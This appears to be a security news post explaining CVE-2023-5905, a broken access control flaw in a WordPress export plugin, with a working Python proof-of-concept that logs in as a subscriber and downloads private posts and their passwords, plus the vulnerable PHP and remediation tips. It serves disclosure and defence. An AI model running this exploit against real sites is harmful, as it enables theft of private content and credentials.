CVE CyberSecurity Database News

CVE-2023-5905 - How a WordPress Plugin Leak Lets Subscribers Steal Your Private Posts and Passwords

Poster -

---

WordPress is the king of the blogging world—but even kings have security holes. In this post, we break down CVE-2023-5905, a real vulnerability in the DeMomentSomTres Export Posts With Images plugin for WordPress. If your site uses this plugin (up to version 20220825), you need to read this.

What Is CVE-2023-5905?

CVE-2023-5905 is a security issue in the “Export Posts With Images” plugin that lets any logged-in WordPress user, even one with the lowest “subscriber” role, export all your blog’s content. That means not just published posts, but private, restricted, and even password-protected posts—including the actual passwords.

Official details:

Version: Affected up to 20220825

- Vulnerability: Broken access control / improper authorization
- Impact: Any logged-in user can export all blog posts, including private/unpublished content and passwords for protected posts.

How Does It Work?

Most export plugins in WordPress are meant for admins or editors. That's because exporting is a big deal—you get to see lots of stuff regular users shouldn't. Unfortunately, the DeMomentSomTres Export Posts With Images plugin forgot to check who was making the export request.

That’s the problem:
Any logged-in account—even just a regular user or subscriber—could visit the export URL and download all content.

All attachments and images connected to those posts

Even if you have posts hidden from the public, anyone with a login (even spammy accounts) could steal them.

Example: How an Attacker Exploits CVE-2023-5905

Say an attacker registers as a user on your WordPress site. By default, they get the “subscriber” role. Normally that means they can only read public blog posts.

But with this plugin installed, all they need to do is visit a special URL or submit a special POST request—and boom, they get all your data.

Here’s a minimal proof-of-concept

import requests

# Replace with your WordPress site login details
username = "attacker"
password = "password123"
wordpress_url = "https://victim-wordpress.com";
export_url = wordpress_url + "/wp-admin/tools.php?page=export_posts_with_images"

# Create a session to handle cookies
sess = requests.Session()

# 1. Login to WordPress
login_payload = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': wordpress_url + '/wp-admin/',
    'testcookie': '1'
}
sess.post(wordpress_url + '/wp-login.php', data=login_payload)

# 2. Trigger export as a regular subscriber
r = sess.get(export_url)
if "xml" in r.text:
    with open("export.xml", "w", encoding="utf-8") as f:
        f.write(r.text)
    print("Exported data obtained! Check export.xml")
else:
    print("Exploit failed or tool not present.")

What You Get In export.xml

Inside, you’ll see posts that are private, drafts, or not published. For posts protected with a password, you’ll find lines like:

<wp:post_password>supersecret</wp:post_password>

That’s the real password used for protected posts—clear as day.

Low barrier: Any account, even a fake or new registration, can steal your secrets.

- Leaks everything: Not only your public posts, but everything, including images and post passwords.
- Hard to detect: Unless you’re watching your logs closely, someone can grab all your confidential posts without you knowing.

How Did This Happen? A Look at the Code

The plugin registers an admin page and a handler for exports. But in its PHP, it forgets to limit who can access the export function:

// Part of the plugin's page registration (simplified)
add_action('admin_menu', function() {
    add_management_page(
        'Export Posts With Images',
        'Export Posts With Images',
        'read', // <-- This allows any logged-in user!
        'export_posts_with_images',
        'render_export_page'
    );
});

WordPress’s “read” capability is granted to ALL logged-in users, including subscribers. It should use “export” (for admins), “manage_options” (for admins), or “edit_posts” (for editors).

Real-World References

- Original plugin on WordPress.org
- WPScan vulnerability advisory
- CVE-2023-5905 entry at MITRE

Update the plugin (if a fix is available) or uninstall it.

2. Remove deactivated/unused export plugins.

Review access policies for sensitive content.

If you ever used this plugin and allowed public registrations, your secret and unpublished blog data may already be out there.


Bottom Line:
CVE-2023-5905 is a big deal for WordPress bloggers running the Export Posts With Images plugin. Don't let your private stories (or passwords) walk right out the door—patch up, clean up, and check your export tools today.


*Have more questions or worried your site is affected? Read the plugin advisory or reach out to a WordPress security professional!*

Timeline

Published on: 01/15/2024 16:15:12 UTC
Last modified on: 01/19/2024 17:58:36 UTC